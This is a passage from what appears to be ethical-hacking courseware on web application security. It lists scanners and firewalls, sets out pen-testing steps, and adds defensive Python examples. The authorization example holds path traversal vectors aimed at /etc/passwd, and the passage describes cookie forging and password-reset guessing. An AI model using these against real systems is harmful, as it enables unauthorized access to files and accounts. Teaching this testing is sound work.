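    results["wrapped_error"] = handle_lookup(conn, "bob")  # closed connection -> generic page
    return results
```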


Module Flow

[Diagram: module flow: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing; current stage: Security Tools]

Now we will discuss web application security tools. Web application security tools help you detect possible vulnerabilities in web applications automatically. Prior to this, we discussed web application countermeasures that prevent attackers from exploiting web applications. In addition to countermeasures, you can also employ security tools to protect your web applications from being hacked. Tools, in addition to the countermeasures, offer more protection.


Web Application Security Tool: Acunetix Web Vulnerability Scanner

- Acunetix WVS checks web applications for SQL injections, cross-site scripting, etc.
- It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
- Port scans a web server and runs security checks against network services
- Tests web forms and password-protected areas
- It includes an automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications

[Screenshot: Acunetix Web Vulnerability Scanner (Free Edition) showing a scan's alerts summary and Acunetix Threat Level]

http://www.acunetix.com

Web Application Security Tool: Acunetix Web Vulnerability Scanner

Source: http://www.acunetix.com

Acunetix Web Vulnerability Scanner automatically checks your web applications for SQL injection, XSS, and other web vulnerabilities. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. It port scans a web server and runs security checks against network services. It even tests web forms and password-protected areas. The automatic client script analyzer allows for security testing of Ajax and Web 2.0 applications.


Web Application Security Tool: Watcher Web Security Tool

- Watcher is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically

[Screenshot: Casaba Watcher Web Security Tool v1.3.0 running inside Fiddler, listing header and information-disclosure checks]

http://www.casaba.com

Web Application Security Tool: Watcher Web Security Tool

Source: http://www.casaba.com

Watcher is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically. Passive detection means it is safe for production use. It detects web-application security issues and operational configuration issues.


Web Application Security Scanner: Netsparker

- Netsparker performs automated comprehensive web application scanning for vulnerabilities such as SQL injection, cross-site scripting, remote code injection, etc.
- It delivers detection, confirmation, and exploitation of vulnerabilities in a single integrated environment

[Screenshot: Netsparker showing the details of a reported cross-site scripting vulnerability]

http://www.mavitunasecurity.com

Web Application Security Scanner: Netsparker

Source: http://www.mavitunasecurity.com

Netsparker® can find and report on security vulnerabilities such as SQL injection and cross-site scripting (XSS) in all web applications, regardless of the platform and the technology they are built on. It allows you to resolve security problems before they are actually misused and compromised by unknown attackers.


Web Application Security Tool: N-Stalker Web Application Security Scanner

- N-Stalker Web Application Security Scanner is an effective suite of web security assessment checks to enhance the overall security of web applications against a wide range of vulnerabilities and sophisticated hacker attacks
- It contains all web security assessment checks such as:
  - Code injection
  - Cross-site scripting
  - Parameter tampering
  - Web server vulnerabilities

[Screenshot: N-Stalker Web Application Security Scanner 2012 - Free Edition]

http://nstalker.com

Web Application Security Tool: N-Stalker Web Application Security Scanner

Source: http://nstalker.com

N-Stalker Web Application Security Scanner provides an effective suite of web security assessment checks to enhance the overall security of your web applications against a wide range of vulnerabilities and sophisticated hacker attacks. It also allows you to create your own assessment policies and requirements, enabling an effective way to manage your application's SDLC, including the ability to control information exposure, development flaws, infrastructure issues, and real security vulnerabilities that can be explored by external agents. It contains all web security assessment checks such as code injection, cross-site scripting, parameter tampering, web server vulnerabilities, etc.


Web Application Security Tool: VampireScan

VampireScan allows users to test their own Cloud and Web applications for basic attacks and receive actionable results all within their own Web portal

Features
- Protect your website from hackers
- Scan and protect your infrastructure and web applications from cyber-threats
- Give you direct, actionable insight on high, medium, and low risk vulnerabilities

http://www.vampiretech.com

Web Application Security Tool: VampireScan

Source: http://www.vampiretech.com

VampireScan allows users to test their own Cloud and Web applications for basic attacks and receive actionable results all within their own Web portal. It can protect your website from hackers. This tool can scan and protect your infrastructure and web applications from cyber-threats and can also give you direct, actionable insight on high, medium, and low risk vulnerabilities.


Web Application Security Tools

- Sandcat Mini: http://www.syhunt.com
- OWASP ZAP: http://www.owasp.org
- skipfish: http://code.google.com
- SecuBat Vulnerability Scanner: http://secubat.codeplex.com
- SPIKE Proxy: http://www.immunitysec.com
- Websecurify: http://www.websecurify.com
- NetBrute: http://www.rawlogic.com
- X5s: http://www.casaba.com
- WSSA - Web Site Security Scanning Service: https://secure.beyondsecurity.com
- Ratproxy: http://code.google.com

Web Application Security Tools

Web application security tools are web application security assessment software designed to thoroughly analyze today's complex web applications with the aim of finding exploitable SQL injection, XSS vulnerabilities, etc. These tools deliver scanning capabilities, broad assessment coverage, and accurate web application scanning results. Commonly used web application security tools are listed as follows:

- Sandcat Mini available at http://www.syhunt.com
- OWASP ZAP available at http://www.owasp.org
- skipfish available at http://code.google.com
- SecuBat Vulnerability Scanner available at http://secubat.codeplex.com
- SPIKE Proxy available at http://www.immunitysec.com
- Websecurify available at http://www.websecurify.com
- NetBrute available at http://www.rawlogic.com
- X5s available at http://www.casaba.com
- WSSA - Web Site Security Scanning Service available at https://secure.beyondsecurity.com


Web Application Security Tools (Cont'd)

- Wapiti: http://wapiti.sourceforge.net
- WebWatchBot: http://www.exclamationsoft.com
- KeepNI: http://www.keepni.com
- Grabber: http://rgaucher.info
- XSSS: http://www.sven.de
- Syhunt Hybrid: http://www.syhunt.com
- Exploit-Me: http://labs.securitycompass.com
- WSDigger: http://www.mcafee.com
- Arachni: http://arachni-scanner.com
- Vega: http://www.subgraph.com

Web Application Security Tools (Cont'd)

In addition to the previously mentioned web application security tools, there are a few more tools that can be used to assess the security of web applications:

- Wapiti available at http://wapiti.sourceforge.net
- WebWatchBot available at http://www.exclamationsoft.com
- KeepNI available at http://www.keepni.com
- Grabber available at http://rgaucher.info
- XSSS available at http://www.sven.de
- Syhunt Hybrid available at http://www.syhunt.com
- Exploit-Me available at http://labs.securitycompass.com
- WSDigger available at http://www.mcafee.com
- Arachni available at http://arachni-scanner.com
- Vega available at http://www.subgraph.com


Web Application Firewall: dotDefender

- dotDefender is a software based Web Application Firewall
- It complements the network firewall, IPS and other network-based Internet security products
- It inspects the HTTP/HTTPS traffic for suspicious behavior
- It detects and blocks SQL injection attacks

[Screenshot: dotDefender configuration showing the SQL Injection pattern list of the default security profile]

http://www.applicure.com

Web Application Firewall: dotDefender

Source: http://www.applicure.com

dotDefender™ is a software-based web application firewall that provides additional website security against malicious attacks and website defacement. Web application attacks such as SQL injection, path traversal, cross-site scripting, and other attacks leading to website defacement can be prevented with dotDefender. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior.


Web Application Firewall: ServerDefender VP

- ServerDefender VP Web application firewall is designed to provide security against web attacks

[Screenshot: ServerDefender VP Settings Manager, Input Validation tab with SQL Injection and Cross-Site Scripting (XSS) protection settings]

http://www.port80software.com

Web Application Firewall: ServerDefender VP

Source: http://www.port80software.com

The ServerDefender VP web application firewall is designed to provide security against web attacks. SDVP security will prevent data theft and breaches and stop unauthorized site defacement, file alterations, and deletions.


Web Application Firewalls

- Radware's AppWall: http://www.radware.com
- ThreatSentry: http://www.privacyware.com
- QualysGuard WAF: http://www.qualys.com
- ThreatRadar: http://www.imperva.com
- ModSecurity: http://www.modsecurity.org
- Barracuda Web Application Firewall: https://www.barracudanetworks.com
- Stingray Application Firewall: http://www.riverbed.com
- IBM Security AppScan: http://www-01.ibm.com
- Trustwave WebDefend: https://www.trustwave.com
- Cyberoam's Web Application Firewall: http://www.cyberoam.com

Web Application Firewalls

Web application firewalls secure web sites, web applications, and web services against
known and unknown attacks. They prevent data theft and manipulation of sensitive corporate
and customer information. Commonly used web application firewalls are listed as follows:

• Radware's AppWall available at http://www.radware.com

• ThreatSentry available at http://www.privacyware.com

• QualysGuard WAF available at http://www.qualys.com

• ThreatRadar available at http://www.imperva.com

• ModSecurity available at http://www.modsecurity.org

• Barracuda Web Application Firewall available at https://www.barracudanetworks.com

• Stingray Application Firewall available at http://www.riverbed.com

• IBM Security AppScan available at http://www-01.ibm.com

• Trustwave WebDefend available at https://www.trustwave.com

• Cyberoam's Web Application Firewall available at http://www.cyberoam.com


Module Flow

[Slide: Module Flow. Diagram of the module's sections: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing]

As mentioned previously, web applications are more vulnerable to attacks. Attackers
use web applications as the sources for spreading attacks by turning them into malicious
applications once compromised. Your web application may also become a victim of such
attacks. Therefore, to avoid this situation, you should conduct penetration testing in order to
determine the vulnerabilities before they are exploited by real attackers.


[Slide: Web Application Pen Testing]

Web Application Pen Testing

Web application pen testing is done to detect various security vulnerabilities and
associated risks. As a pen tester, you should test your web application for vulnerabilities such as
input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc.
The best way to carry out a penetration test is to conduct a series of methodical and repeatable
tests, and to work through all of the different application vulnerabilities.

Web application pen testing helps in:

• Identification of ports: Scan the ports to identify the associated running services and
analyze them through automated or manual tests to find weaknesses.

• Verification of vulnerabilities: Exploit the vulnerability in order to test and fix the issue.

• Remediation of vulnerabilities: Retest the solution against the vulnerability to ensure
that it is completely secure.


[Slide: Web Application Pen Testing (Cont'd). Flow diagram: START → Information Gathering → Configuration Management Testing → Authentication Testing → Session Management Testing → Authorization Testing → Business Logic Testing → Data Validation Testing → Denial-of-Service Testing → Web Services Testing → AJAX Testing]

Web Application Pen Testing (Cont'd)

The general steps that you need to follow to conduct a web application penetration
test are listed as follows. In a future section, each step is explained in detail.

Step 1: Defining objective

You should define the aim of the penetration test before conducting it. This helps you to
move in the right direction toward the aim of the penetration test.

Step 2: Information gathering

You should gather as much information as possible about your target system or network.

Step 3: Configuration management testing

Most web application attacks occur because of improper configuration. Therefore, you should
conduct configuration management testing. This also helps you to protect against known
vulnerabilities by installing the latest updates.

Step 4: Authentication session testing

Test the authentication session to understand the authentication mechanism and to determine
the possible exploits in it.


[Slide: Information Gathering]
• Retrieve and analyze the robots.txt file using tools such as GNU Wget (reveals: allowed and disallowed directories)
• Use the advanced "site:" search operator and then click "Cached" to perform search engine reconnaissance (reveals: issues of web application structure, error pages produced)
• Identify application entry points using tools such as WebScarab, Burp Proxy, OWASP ZAP, TamperIE (for Internet Explorer), or Tamper Data (for Firefox) (reveals: cookie information, HTTP 300 and 400 status codes, 500 internal server errors)
• To identify web applications: probe for URLs, do dictionary-style searching (intelligent guessing), and perform vulnerability scanning using tools such as Nmap (port scanner) and Nessus (reveals: web applications, old versions of files or artifacts)
• Analyze the output from HEAD and OPTIONS HTTP requests (reveals: web server software version, scripting environment, and OS in use)
• Implement techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, and querying search engines (googling)

Information Gathering

Let's get into detail and discuss each web application test step thoroughly.

The first step in web application pen testing is information gathering. To gather all the
information about the target application, follow these steps:

Step 1: Analyze the robots.txt file

robots.txt is a file that instructs web robots (crawlers) which directories of the web site they
are allowed and not allowed to visit. Hence, analyze robots.txt and determine the allowed and
disallowed directories of a web application. You can retrieve and analyze the robots.txt file
using tools such as GNU Wget.

Step 2: Perform search engine reconnaissance

Use the advanced "site:" search operator and then click Cached to perform search engine
reconnaissance. It gives you information such as issues of web application structure and error
pages produced.
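The robots.txt analysis of step 1, as an added Python example (not EC-Council's or any tool's code): it parses the file into per-agent Allow/Disallow rules and lists every path the file discloses to anyone who fetches it. The robots.txt text is a constructed sample, and the function names are my own.

```python
"""Report what a robots.txt file discloses (added example; not from the original module)."""
from typing import Dict, List

# Constructed sample file; not retrieved from any real site.
SAMPLE_ROBOTS = """\
# robots.txt for a test application (constructed sample)
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /cgi-bin/
Allow: /public/

User-agent: Googlebot
Disallow: /old-site/
Crawl-delay: 10
"""

Rules = Dict[str, Dict[str, List[str]]]


def parse_robots(text: str) -> Rules:
    """Return {user_agent: {"allow": [...], "disallow": [...]}}.

    Several User-agent lines in a row share the rules that follow them; a
    User-agent line that appears after rules starts a new record. Comments
    (#) and fields we do not need (e.g. Crawl-delay) are ignored.
    """
    rules: Rules = {}
    agents: List[str] = []     # agents the current record applies to
    seen_rule = False          # have we seen Allow/Disallow for them yet?
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if seen_rule:
                agents, seen_rule = [], False
            agents.append(value)
            rules.setdefault(value, {"allow": [], "disallow": []})
        elif field in ("allow", "disallow"):
            seen_rule = True
            if value:  # an empty "Disallow:" means "nothing is disallowed"
                for agent in agents:
                    rules[agent][field].append(value)
    return rules


def rules_for(rules: Rules, agent: str) -> Dict[str, List[str]]:
    """Rules a given crawler would follow: its own record first, else '*'."""
    return rules.get(agent) or rules.get("*") or {"allow": [], "disallow": []}


def disclosed_paths(rules: Rules) -> List[str]:
    """Every path the file names, for any agent.

    Crawlers may honour Disallow, but anyone who fetches the file sees the
    paths, so this is the list to review from the application's side.
    """
    paths = set()
    for record in rules.values():
        paths.update(record["allow"])
        paths.update(record["disallow"])
    return sorted(paths)


if __name__ == "__main__":
    parsed = parse_robots(SAMPLE_ROBOTS)
    for agent, record in parsed.items():
        print(f"{agent}: disallow={record['disallow']} allow={record['allow']}")
    print("paths disclosed to any reader:", disclosed_paths(parsed))
```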


[Slide: Information Gathering (Cont'd)]

Information Gathering (Cont'd)

Step 6: Analyze error codes

Analyze error codes by requesting invalid pages and utilizing alternate request methods
(POST/PUT/other) in order to collect confidential information from the server. This may reveal
information such as software versions, details of databases, bugs, and technological
components.

Step 7: Test for recognized file types/extensions/directories

Test for recognized file types/extensions/directories by requesting common file extensions such
as .ASP, .HTM, .PHP, .EXE, and observe the response. This may give you an idea about the web
application environment.

Step 8: Examine source of available pages

Examine the source code of the accessible pages of the application front-end. This provides
clues about the underlying application environment.

Step 9: TCP/ICMP and service fingerprinting

Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as
Nmap and Queso, or the more recent application fingerprinting tool Amap. This gives you
information about web application services and associated ports.


[Slide: Configuration Management Testing]
• Perform SSL/TLS testing: identify the ports associated with SSL/TLS wrapped services using Nmap and Nessus (reveals: disclosure of confidential information)
• Perform infrastructure configuration management testing: perform network scanning and analyze the web server banner (reveals: source code of the application)
• Perform application configuration management testing: test the application configuration management using CGI scanners and by reviewing the contents of the web server, application server, comments, configuration, and logs; review source code, enumerate application pages and functionality (reveals: information in the source code, log files, and default error codes)
• Test for file extensions handling: use vulnerability scanners, spidering and mirroring tools, search engine queries, or manual inspection (reveals: confidential information about access credentials)
• Verify the presence of old, backup, and unreferenced files (reveals: source code, installation paths, passwords for applications, and databases)
• Test for infrastructure and application admin interfaces: perform directory and file enumeration, review server and application documentation, etc. (reveals: admin interfaces that can be found to gain access to admin functionality)
• Test for HTTP methods and XST: review the OPTIONS HTTP method using Netcat or Telnet (reveals: credentials of legitimate users)

Configuration Management Testing

Once you gather information about the web application environment, test the
configuration management. It is important to test the configuration management because
improper configuration may allow unauthorized users to break into the web application.

Step 1: Perform SSL/TLS testing

SSL/TLS testing allows you to identify the ports associated with SSL/TLS wrapped services. You
can do this with the help of tools such as Nmap and Nessus. This helps disclose confidential
information.

Step 2: Perform infrastructure configuration management testing

Perform network scanning and analyze web server banners in order to analyze the source code
of the application.

Step 3: Perform application configuration management testing

Test the application's configuration management using CGI scanners and by reviewing the
contents of the web server, application server, comments, configuration, and logs. This gives
you information about the source code, log files, and default error codes.
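Information gathering steps 6 and 7, the HEAD/OPTIONS analysis on the information gathering slide, and the HTTP methods/XST check on the configuration management slide all come down to reading HTTP responses carefully. This added Python example (not from the courseware) parses constructed responses and reports version-revealing headers, verbose error pages, and risky methods advertised in the Allow header; the host name, software versions and error text are invented for the example.

```python
"""Inspect HTTP responses for fingerprints, error leaks and risky methods (added example)."""
import re
from typing import Dict, List, Tuple

# Constructed raw responses, as netcat or an intercepting proxy would show them.
# Host name, software versions and error text are invented for the example.
OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.22 (Ubuntu)\r\n"
    "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"
    "Content-Length: 0\r\n\r\n"
)
HEAD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "X-AspNet-Version: 4.0.30319\r\n"
    "Content-Type: text/html\r\n\r\n"
)
NOT_FOUND_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: Apache/2.2.22 (Ubuntu)\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<html><body><h1>Not Found</h1>\n"
    "<address>Apache/2.2.22 (Ubuntu) Server at app.example.test Port 80</address>"
    "</body></html>"
)
SERVER_ERROR_RESPONSE = (
    "HTTP/1.1 500 Internal Server Error\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<pre>Traceback (most recent call last):\n"
    '  File "app.py", line 12, in search\n'
    'OperationalError: (1064, "You have an error in your SQL syntax")</pre>'
)


def parse_response(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Split a raw response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

# Headers that reveal server software, framework or runtime versions.
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")

def fingerprint(headers: Dict[str, str]) -> Dict[str, str]:
    """Version-revealing headers present in the response."""
    return {h: headers[h] for h in FINGERPRINT_HEADERS if h in headers}

# Patterns showing that an error page says more than it should.
LEAK_PATTERNS = {
    "server signature": re.compile(r"<address>.*?Server at.*?</address>", re.I | re.S),
    "stack trace": re.compile(
        r"Traceback \(most recent call last\)|Stack Trace:|at [\w.$]+\(\w+\.java:\d+\)", re.I),
    "database error": re.compile(r"SQL syntax|ODBC|ORA-\d{5}|SQLSTATE", re.I),
}

def error_page_leaks(body: str) -> List[str]:
    """Names of the leak patterns found in an error page body."""
    return [name for name, pattern in LEAK_PATTERNS.items() if pattern.search(body)]

# Methods whose presence in Allow deserves a closer look, and why.
RISKY_METHODS = {
    "TRACE": "cross-site tracing (XST): the server echoes request headers, cookies included",
    "PUT": "may allow uploading files to the server",
    "DELETE": "may allow removing resources",
    "CONNECT": "may let the server be used as a proxy",
}

def risky_methods(headers: Dict[str, str]) -> Dict[str, str]:
    """Risky methods advertised in the Allow header of an OPTIONS response."""
    allowed = [m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()]
    return {m: RISKY_METHODS[m] for m in allowed if m in RISKY_METHODS}

def analyze(raw: str) -> Dict[str, object]:
    """Everything a tester notes from one response, in one dictionary."""
    status, headers, body = parse_response(raw)
    return {"status": status, "fingerprint": fingerprint(headers),
            "leaks": error_page_leaks(body), "risky_methods": risky_methods(headers)}

if __name__ == "__main__":
    for label, raw in [("OPTIONS", OPTIONS_RESPONSE), ("HEAD", HEAD_RESPONSE),
                       ("404", NOT_FOUND_RESPONSE), ("500", SERVER_ERROR_RESPONSE)]:
        print(label, analyze(raw))
```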


[Slide: Authentication Testing]
• Test for vulnerable remember password and password reset: try to reset passwords by guessing, social engineering, or cracking secret questions, if used. Check if a "remember my password" mechanism is implemented by checking the HTML code of the login page (reveals: authentication vulnerabilities)
• Test for logout and browser cache management: check if it is possible to "reuse" a session after logout. Also check if the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache
• Test for CAPTCHA: identify all parameters that are sent in addition to the decoded CAPTCHA value from the client to the server and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old session ID (reveals: authentication vulnerabilities)
• Test for multiple factors authentication: check if users hold a hardware device of some kind in addition to the password. Check if the hardware device communicates directly and independently with the authentication infrastructure using an additional communication channel (reveals: multiple factors authentication vulnerabilities)
• Test for race conditions: attempt to force a race condition, make multiple simultaneous requests while observing the outcome for unexpected behavior. Perform code review (reveals: race conditions)

Authentication Testing

You need to perform the following steps to carry out authentication testing:

Step 1: Test for vulnerable remember password and password reset

Test for a vulnerable remember password and password reset by attempting to reset passwords by
guessing, social engineering, or cracking secret questions, if used. Check if a "remember my
password" mechanism is implemented by checking the HTML code of the login page; through
this check, authentication weaknesses can be uncovered.

Step 2: Test for logout and browser cache management

Check if it is possible to "reuse" a session after logout. Also check if the application
automatically logs out a user when that user has been idle for a certain amount of time, and
that no sensitive data remains stored in the browser cache.

Step 3: Test for CAPTCHA

Identify all parameters that are sent in addition to the decoded CAPTCHA value from the client
to the server and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old
session ID. This helps you to determine authentication vulnerabilities.
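Step 1 has you read the login page's HTML; the following added Python example (mine, not EC-Council's) does that reading with the standard library's HTMLParser and reports what a tester would note: the form's transport and method, a "remember me" control, and password fields that permit browser autocomplete. The two login pages and the host name are constructed.

```python
"""Audit a login page's markup for the items step 1 checks (added example)."""
from html.parser import HTMLParser
from typing import Dict, List

# Constructed login pages; the host name is invented.
WEAK_LOGIN_PAGE = """<html><body>
<form id="login" action="http://app.example.test/login" method="post">
  <input type="text" name="user">
  <input type="password" name="pass" autocomplete="on">
  <input type="checkbox" name="remember"> Remember my password
  <input type="submit" value="Log in">
</form>
</body></html>"""

HARDENED_LOGIN_PAGE = """<html><body>
<form id="login" action="https://app.example.test/login" method="post" autocomplete="off">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Log in">
</form>
</body></html>"""


class LoginFormCollector(HTMLParser):
    """Collect every form that contains a password field, with what the tester looks at."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict] = []
        self._form: Dict = {}   # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {
                "action": a.get("action", ""),
                "method": a.get("method", "get").lower(),
                "autocomplete": a.get("autocomplete", "on").lower(),
                "password_fields": [],
                "remember_me": False,
            }
        elif tag == "input" and self._form:
            kind = a.get("type", "text").lower()
            if kind == "password":
                # A field without its own attribute inherits the form's setting.
                self._form["password_fields"].append({
                    "name": a.get("name", ""),
                    "autocomplete": a.get("autocomplete", self._form["autocomplete"]).lower(),
                })
            elif kind == "checkbox" and "remember" in (a.get("name", "") + a.get("id", "")).lower():
                self._form["remember_me"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form:
            if self._form["password_fields"]:
                self.forms.append(self._form)
            self._form = {}


def audit_login_page(page: str) -> List[str]:
    """Findings a tester would note from the login page's HTML."""
    parser = LoginFormCollector()
    parser.feed(page)
    parser.close()
    findings: List[str] = []
    for form in parser.forms:
        if form["action"].lower().startswith("http://"):
            findings.append(f"password form submits over plain HTTP: {form['action']}")
        if form["method"] != "post":
            findings.append("password form submits with GET: credentials land in URLs and logs")
        if form["remember_me"]:
            findings.append("'remember me' option present: test the persistent login token it issues")
        for field in form["password_fields"]:
            if field["autocomplete"] != "off":
                findings.append(f"password field '{field['name']}' allows browser autocomplete")
    return findings


if __name__ == "__main__":
    print("weak page:", audit_login_page(WEAK_LOGIN_PAGE))
    print("hardened page:", audit_login_page(HARDENED_LOGIN_PAGE))
```

Current browsers ignore autocomplete="off" on password fields, so treat that finding as a hint about the developers' intent rather than a control; the form posting over plain HTTP and the persistent "remember me" token are the findings to follow up.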


[Slide: Session Management Testing]
• Test for session management schema: collect a sufficient number of cookie samples, analyze the cookie generation algorithm, and forge a valid cookie in order to perform the attack (risk: cookie tampering results in hijacking the sessions of legitimate users)
• Test for cookie attributes using intercepting proxies such as WebScarab, Burp Proxy, OWASP ZAP, or traffic intercepting browser plug-ins such as "TamperIE" (for IE) and "Tamper Data" (for Firefox) (risk: cookie information to hijack a valid session)
• Test for session fixation: make a request to the site to be tested and analyze vulnerabilities using the WebScarab tool (risk: attacker could steal the user session (session hijacking))
• Test for exposed session variables by inspecting encryption and reuse of the session token, proxies and caching, GET and POST, and transport vulnerabilities (risk: confidential information of the session token leads to a replay session attack)
• Test for CSRF (Cross-Site Request Forgery): examine the URLs in the restricted area (risk: compromises end user data and operation or the entire web application)

Session Management Testing

After testing the configuration management, test how the application manages the
session. The following are the steps to conduct session management pen testing:

Step 1: Test for session management schema

Collect a sufficient number of cookie samples, analyze the cookie generation algorithm, and
forge a valid cookie in order to perform the attack. This allows you to test your application
against cookie tampering, which results in hijacking the sessions of legitimate users.

Step 2: Test for cookie attributes

Test for cookie attributes using intercepting proxies such as WebScarab, Burp Proxy, OWASP
ZAP, or traffic intercepting browser plugins such as "TamperIE" (for IE) and "Tamper Data" (for
Firefox). If you are able to retrieve cookie information, then you can use this information to
hijack a valid session.

Step 3: Test for session fixation

To test for session fixation, make a request to the site to be tested and analyze vulnerabilities
using the WebScarab tool. This helps you to determine whether your application is vulnerable
to session hijacking.
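Steps 1 to 3 above, as an added Python example that is not part of the courseware: it audits the attributes of captured Set-Cookie headers, measures whether a set of collected session IDs looks like a counter or like random output, and checks that the session ID is rotated at login (the condition session fixation abuses). All cookie headers and IDs are constructed samples.

```python
"""Session management checks on captured cookies and session IDs (added example)."""
import math
from collections import Counter
from typing import Dict, List, Tuple

# Constructed Set-Cookie headers, as an intercepting proxy would list them.
SET_COOKIE_HEADERS = [
    "JSESSIONID=000186A0; Path=/",
    "auth=abc123; Path=/; HttpOnly",
    "pref=dark;�Path=/; Secure; HttpOnly; SameSite=Lax",
]

# Constructed session ID samples: the first set is a counter, the second looks random.
WEAK_IDS = ["000186A0", "000186A1", "000186A2", "000186A3"]
STRONG_IDS = ["9c1f4e7a2b", "0377d1e9ac", "e52b8a0f61"]


def parse_set_cookie(header: str) -> Tuple[str, str, Dict[str, str]]:
    """Return (name, value, {attribute: value}) with attribute names lower-cased."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookie(header: str) -> Tuple[str, List[str]]:
    """Step 2: attributes the cookie should carry and the risk when it does not."""
    name, _, attrs = parse_set_cookie(header)
    issues = []
    if "secure" not in attrs:
        issues.append("no Secure: also sent over plain HTTP, so it can be sniffed")
    if "httponly" not in attrs:
        issues.append("no HttpOnly: readable by script, so XSS can steal it")
    if "samesite" not in attrs:
        issues.append("no SameSite: sent on cross-site requests, which helps CSRF")
    return name, issues


def bits_per_char(samples: List[str]) -> float:
    """Step 1: Shannon entropy of the characters across all samples (max 4.0 for hex)."""
    counts = Counter("".join(samples))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def looks_sequential(samples: List[str]) -> bool:
    """Step 1: do the IDs, read as hex numbers, advance by a small constant step?"""
    try:
        numbers = [int(s, 16) for s in samples]
    except ValueError:
        return False
    steps = {b - a for a, b in zip(numbers, numbers[1:])}
    return len(samples) >= 3 and len(steps) == 1 and 0 < steps.pop() < 16


def session_rotated(id_before_login: str, id_after_login: str) -> bool:
    """Step 3: a fixation-resistant application issues a new ID once the user authenticates."""
    return id_before_login != id_after_login


if __name__ == "__main__":
    for header in SET_COOKIE_HEADERS:
        print(audit_cookie(header))
    print("weak IDs:", round(bits_per_char(WEAK_IDS), 2), "bits/char, sequential:",
          looks_sequential(WEAK_IDS))
    print("strong IDs:", round(bits_per_char(STRONG_IDS), 2), "bits/char, sequential:",
          looks_sequential(STRONG_IDS))
    print("ID kept across login:", not session_rotated("000186A0", "000186A0"))
```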


[Slide: Authorization Testing]

Authorization Testing

Follow the steps here to test the web application against authorization
vulnerabilities:

Step 1: Test for path traversal

Test for path traversal by performing input vector enumeration and analyzing the input
validation functions present in the web application. Path traversal allows attackers to gain
access to reserved information.

Step 2: Test for bypassing authorization schema

Test for bypassing the authorization schema by examining the admin functionalities, to gain access
to the resources assigned to a different role. If the attacker succeeds in bypassing the
authorization schema, he or she can gain illegal access to reserved functions/resources.

Step 3: Test for privilege escalation

Test for role/privilege manipulation. If the attacker has access to resources/functionality, then
he or she can perform a privilege escalation attack.
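The input vector enumeration of step 1, as an added Python example rather than anything from the courseware: the same traversal vectors are run through a naive path resolver and a hardened one, so the test shows which resolver lets a request leave the document root. The document root and file names are constructed; nothing is read from disk.

```python
"""Path traversal: input vector enumeration against a naive and a hardened resolver (added example)."""
import posixpath
from typing import Callable, List
from urllib.parse import unquote

WEBROOT = "/var/www/app/public"   # constructed document root; nothing is read from disk

# Input vectors a tester enumerates: one benign request and the usual traversal forms.
TRAVERSAL_VECTORS = [
    "readme.txt",                    # benign
    "../../etc/passwd",              # plain dot-dot
    "..%2f..%2fetc%2fpasswd",        # URL-encoded slashes
    "%2e%2e/%2e%2e/etc/passwd",      # URL-encoded dots
    "%252e%252e/etc/passwd",         # double-encoded dots: only bites if something decodes twice
    "/etc/passwd",                   # absolute path
    "images/../../../etc/passwd",    # dot-dot after a legitimate directory
]


def vulnerable_resolve(root: str, requested: str) -> str:
    """Decode once and join: the pattern the test is looking for."""
    return posixpath.join(root, unquote(requested))


def safe_resolve(root: str, requested: str) -> str:
    """Decode once, refuse anything still encoded, normalise, then confine to root."""
    decoded = unquote(requested)
    if "%" in decoded:
        raise ValueError("still encoded after one decode: rejected")
    # Treat the request as relative to the root, whatever it looks like.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root.rstrip("/") + "/"):
        raise ValueError("path escapes the document root")
    return candidate


def escapes_root(root: str, resolved: str) -> bool:
    """Does the resolved path lie outside root once '.' and '..' are collapsed?"""
    normalised = posixpath.normpath(resolved)
    return normalised != root and not normalised.startswith(root.rstrip("/") + "/")


def probe(resolver: Callable[[str, str], str], root: str = WEBROOT) -> List[str]:
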